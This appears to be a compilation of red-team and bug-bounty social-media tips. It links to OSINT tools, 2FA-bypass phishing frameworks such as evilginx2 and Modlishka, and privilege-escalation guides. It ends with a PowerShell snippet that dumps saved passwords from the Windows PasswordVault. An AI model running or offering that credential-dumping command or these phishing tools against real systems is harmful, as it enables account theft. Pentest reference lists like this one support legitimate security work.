Have you checked your PSReadline history lately? Do you know it stores the commands in clear-text and is persistent across reboots? This is on a Domain Controller. #PowerShell #RedTeam
#OSINT :
Built With: https://builtwith.com
Google Dorks: https://exploit-db.com/google-hacking-database/
Metagoofil: https://code.google.com/archive/p/metagoofil
Censys: https://censys.io
URLScan: https://urlscan.io
DNSStuff: https://dnsstuff.com/tools
Netcraft: https://searchdns.netcraft.com
#bugbountytips #redteam #BugBountyTip
BuiltWith
Find out what websites are BuiltWith
different 2FA bypasses:
evilginx: https://github.com/kgretzky/evilginx2
CredSniper: https://github.com/ustayready/CredSniper
ReelPhish: https://github.com/fireeye/ReelPhish
Modlishka: https://github.com/drk1wi/Modlishka
#pentest #hacking #phishing #redteam #bugbountytip
GitHub
GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session…
Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication - kgretzky/evilginx2
Useful for #redteam
PENTESTING-BIBLE
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
Nishang
https://github.com/samratashok/nishang
Awesome Red Teaming
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
LOLBins and LOLScripts
https://github.com/LOLBAS-Project/LOLBAS
Collection Document
https://github.com/tom0li/collection-document
Venom
https://github.com/Dliv3/Venom
#bugbountytip
GitHub
GitHub - blaCCkHatHacEEkr/PENTESTING-BIBLE: articles
articles. Contribute to blaCCkHatHacEEkr/PENTESTING-BIBLE development by creating an account on GitHub.
Hacking SQL Server Stored Procedures
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
NetSPI
Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases
In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API: http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection, AKA formula injection, to embed a malicious payload into a spreadsheet.
Linux For Pentester:tmux Privilege Escalation.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
Return a list of endpoints from a swagger.json.
Pass them to your fuzzer(s), +profit?
curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'
#bugbounty #bugbountytips #redteam #security #oneliner #bash
Dump local Creds
PS>
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }
#redteam #pentest